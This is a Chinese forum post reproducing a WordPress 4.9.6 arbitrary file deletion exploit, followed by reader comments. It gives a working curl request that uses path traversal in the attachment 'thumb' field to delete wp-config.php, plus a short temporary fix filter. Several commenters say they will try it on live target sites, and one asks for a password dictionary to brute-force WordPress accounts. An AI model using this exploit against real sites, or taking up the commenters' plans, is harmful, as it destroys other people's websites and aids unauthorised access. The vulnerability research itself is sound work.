最新版wordpress任意文件删除漏洞复现
0x01 前言 
在推特上看到了一篇paper,点我啊
wp很久没看到洞了,这个漏洞七个月之前就上报了
可以直接利用删除图片那个功能删除网站配置文件,导致网站只能重装。
0X01 复现过程
这是我下载的最新版wordpress(4.9.6)
登陆后台:
上传张图片:
然后edit
发挥一下Curl的作用。
执行:
curl -v 'http://192.168.19.129/wordpress/wp-admin/post.php?post=7' -H 'Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=wing%7C1531306971%7CZycd9e4B1COvm6oKBWF2SlMfqWu2u0xTG85eAD4giBx%7C099559ea1580b258b82765641ac85a51576507c8c3ebb8e131b20c9eec8f65bc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=wing%7C1531306971%7CZycd9e4B1COvm6oKBWF2SlMfqWu2u0xTG85eAD4giBx%7Cba9defabde03b6acdb4a5c43fc39244efbec15913483ae43ff0b624be552f5a4; wp-settings-time-1=1530097413' -d 'action=editattachment&_wpnonce=28380b3d4a&thumb=../../../../wp-config.php'这里把里面的cookie和_wpnonce还有post的值换成你的。
_wpnonce在页面中:
302跳转说明编辑成功。
现在点击Delete Permanently即可。
配置文件成功删除。
漏洞原理作者博客上有细节,本意是删除缩略图。但是没有对路径做限制,导致可以任意文件删除。
作者给的修复代码
add_filter( 'wp_update_attachment_metadata', 'rips_unlink_tempfix' );
function rips_unlink_tempfix( $data ) {
if( isset($data['thumb']) ) {
$data['thumb'] = basename($data['thumb']);
}
return $data;
}0x02 Sakura
鸡肋之处在于需要管理员权限,但是危害蛮大的。
see you!
TCV=0
关于作者
评论21次
要登录是硬伤呀
什么都不缺了,现在就缺账号和密码了
问问大佬你的wing用户是普通注册用户还是管理员用户啊
只要是作者权限就行,就是编辑权限
需要管理员权限,说实话很鸡肋
要登录是硬伤呀
以前报过类似的给wp,完全不认啊..
需要有权限,就
这个漏洞还是可以的
顺便求一个密码字典,用于爆破WordPress账户密码。.gif)
如果你是某篇文章的作者,你就可以删除图片,然后导致xi统重装。并不是网站管理员权限。
问问大佬你的wing用户是普通注册用户还是管理员用户啊
好多blog不能注册。。。。
wordpress能进后台都能直接gstshell,这个确实有点
感谢,本地测试成功,明天试试实战,刚好有wp的站,有作者的账号
登后台,有后台了都能拿权限了
登录到后台会有不同等级权限的。不过如果后台只有单独的管理员权限除外
登后台,有后台了都能拿权限了
正好手头有个目标站盯了俩星期了,试试
在这篇文章,看到了一些分析。https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
对啊,这就是我开始给的传送门。https://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/ 还有这个。我帖子有点错误,不需要是管理员权限,但是要能进后台,得有作者权限。
在这篇文章,看到了一些分析。 https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
在twitter上看到过利用方法
快删我博客